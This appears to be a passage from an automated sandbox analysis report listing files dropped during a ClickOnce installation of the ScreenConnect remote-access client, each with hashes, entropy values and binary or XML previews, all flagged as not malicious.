                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKG8eL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:jeiDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                        MD5:2CD37540B21380A0E1C479FFD5D6D83D
                                                                                                                                                                                                                                                        SHA1:F94198614FA3A3E1EDCAE9F3FD4C7246FE8BDF3A
                                                                                                                                                                                                                                                        SHA-256:D830540EB243DA536BE2F968ED5EBAEFA20209208FFF6176C00D5660CD80340C
                                                                                                                                                                                                                                                        SHA-512:3E3221821329103C0F9003F548964B346B898DC90B06B1179890ED51959AAF36D9D9379A95B6EB4FC431EFEEA9A561EBA69F3DE0514138FA8C5635C40DA37C22
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ............Y'..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                        Entropy (8bit):3.213144440746552
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKZwefzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:6eqtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                        MD5:6BD225F8678D3A55FCB94E43E5B35F41
                                                                                                                                                                                                                                                        SHA1:FED2515CD44A4D67F0AC3A8015804C8F5A5C6B08
                                                                                                                                                                                                                                                        SHA-256:5FDEB4E98E6B58271504F4B58121DDF9635E5BF952A641EAF70E26781E98D3FB
                                                                                                                                                                                                                                                        SHA-512:B8A6645E1E06925538D27CE56C6DD83FADF002D2CE2979748ABF5792B56871B0A93748F4C865AF3B5C6D13F080616407B385CC3FC8947646725DB72BB110997A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... .........#..o'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                        Entropy (8bit):3.9918442063391626
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKzMbetlIls0fOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:LMRmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                        MD5:AF6F767CDEC867AF4A30FA8F8D5ED484
                                                                                                                                                                                                                                                        SHA1:9BDEEB2FE5ACC77E83CDE63F6725532DB7C0B6CC
                                                                                                                                                                                                                                                        SHA-256:552097852881A80631AC6299275A80CB231CF7A133E769AA32BC6D86231B764A
                                                                                                                                                                                                                                                        SHA-512:1EC204C1256B131976872B850FB6D3B669A5A4B06B141A464006F8FD406795F43A42B7D89ECFF5EA1F545F76EF99FFA618AB824F7178CD2335713F4DFE3C9517
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ....(.......d'..(................].G{%....}p.*....................}p.*.. ........\...&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                                        Entropy (8bit):3.060772882719261
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kK7shLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:TshLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                        MD5:26EC0DAF65B002D8C27C9E896326BD84
                                                                                                                                                                                                                                                        SHA1:D5F886529DB0D713786ADA0851CACD2783805A70
                                                                                                                                                                                                                                                        SHA-256:035A93A731C27500974A4568B2833BABC3C6D78028CB580F243846B97814DE4A
                                                                                                                                                                                                                                                        SHA-512:49A117D4D4833D8D11477D58D2799A1359D805BEDF86A03371E4B61DA6E9F16B50A5D108A0B8B70AA3A6A3E751A5B7309D2EE85228EDC409973DAF8734DFFC96
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ....l...!0F.H'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                                        Entropy (8bit):5.634499234636374
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:2rqD/Gch63X91yYFX9R/QPIBM7YT6a3nPdWhe:2W5h63X9PX9R/QPI+0TWhe
                                                                                                                                                                                                                                                        MD5:E74E4D74D52D693A9A7F451682355E5B
                                                                                                                                                                                                                                                        SHA1:F2D2C52DA61D841342339BDACC06024C0A65F99E
                                                                                                                                                                                                                                                        SHA-256:0ECB1951081FD2AECCA9DD979EB1DE131E32D0D084030CA1B5D1C4A3FE9906E7
                                                                                                                                                                                                                                                        SHA-512:23CE8B7AAB3F796AF5C7551C746AEC9DD44CCF9F578FBB3D0DFD7709F46B0D0F3F64B0567D7E46011DBB86D4A8F0D0BB0921A32CD0CA47BA924C6A8B9152327C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........rH..xjZf.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........U............S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...P...S...W...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                                        Entropy (8bit):4.283134017477995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:d6IEAeF7lMDWWuLgJOe6S+9owQX7gq7mLT4qQBmJIew1oohIYX:ksWW+eV+WwQXzmLT4vBDewRhIYX
                                                                                                                                                                                                                                                        MD5:F8B321C4C91D834DA9F02213EA1380E2
                                                                                                                                                                                                                                                        SHA1:C6F85E834BE90EF99C337991CE2F70F8A11387FC
                                                                                                                                                                                                                                                        SHA-256:065AB32CD537F120B20E687C8724683126AC223428B70822D434A8A8DBB11122
                                                                                                                                                                                                                                                        SHA-512:AB0D3D8EC8C4B388D6BA5203D2E185099F1FD0F81E5A155B86C420C84489DCAF7FD457C645203E6F10CA4F8292F56595B6D42D0B890230BD060BA23EA0F85E03
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........,.>...j.#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........U..........'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5256
                                                                                                                                                                                                                                                        Entropy (8bit):4.0250811707239675
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:+w4+RzgZxeV+Ww7kk7bFME8uIm+ctYwnANbz:LRzgIJu7GeIaAp
                                                                                                                                                                                                                                                        MD5:341BD08CB7F6EDCDD4FE1F8993E1A5C9
                                                                                                                                                                                                                                                        SHA1:A9AD8697806F31B61D07DB50FD5098EFE32F816F
                                                                                                                                                                                                                                                        SHA-256:8AACCF0BEACA243DB4CEDB7DB00FBD3260DC65ED831BCBC20E3DD38A1F2A73A7
                                                                                                                                                                                                                                                        SHA-512:AF63E3F5EF5F41DE3F82768FD1AC5AE657308949430D798C7FC90CB7C0980791D77BE91593227CFAE4BE0AFF7C0EB5137208451C1E34C051CC02F758CD56BE68
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........=c..N.H.4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........U..........[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u".....E..X.%...s".I...R&...F.....Ey)....+.`...m,......;../............... ...#...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$...(...8.......`.......h.......x...(.......................(...............................(... .......H.......P...(...`...................(.......................(...............d...........l.......................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):6584
                                                                                                                                                                                                                                                        Entropy (8bit):3.947321881564364
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:Oh0PPBpRWeV+Www+8WpSqlzIoM3vyltUQJIlvObDTVqO/t7:lPPLJypSkcyJ2ObVR
                                                                                                                                                                                                                                                        MD5:083450DF6F2B70621EBF0ECE2C79AA86
                                                                                                                                                                                                                                                        SHA1:ABB7BF482552AD1B9B62D33EE40754293CB0A9A4
                                                                                                                                                                                                                                                        SHA-256:0D8183E4A8800310C1940CFE23A76090524F2A661600B645302E220A7E63FD99
                                                                                                                                                                                                                                                        SHA-512:420E034E9A6AA97E569A80D72444DF4F527FA13196A27A646E9F428E59B30C2DA3C503EF5E551274FE07EB602021BCB5344E0AB6AC632B047060D1F59CAF8E6E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........'_.."...@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........U..............}'.d................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u).....E..X.,...F.....Ey/...O.&r..Vz2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...`...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                                        Entropy (8bit):4.877417023647245
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:fa6Q/cUgJOe6S+9oww7gk7Fw+f7iI++5dFkEM6Vbjft0nwbOA:faV/cAeV+WwwFFwOiMRkbort0nEOA
                                                                                                                                                                                                                                                        MD5:0B52895474211A7B870D086B45646E81
                                                                                                                                                                                                                                                        SHA1:AE29D7BF8949317A2B39F61FB7126643BA65EEC6
                                                                                                                                                                                                                                                        SHA-256:1D6ACB2363856BCB2C116165E6E4EE110FB09DB666A2A90DE8FEEB44D28339C4
                                                                                                                                                                                                                                                        SHA-512:B95BA9FC407E873C11CABE3359CDAF27BB753028B52CFB6EF9310C539260BDC9FB04716A16642BCF1239DB35B86338D8BD9C5C8A6F6E646CF4871D891AB96515
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........O..!..@............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........U............S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............<...........MdSp ...$....... ...".............Bp urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
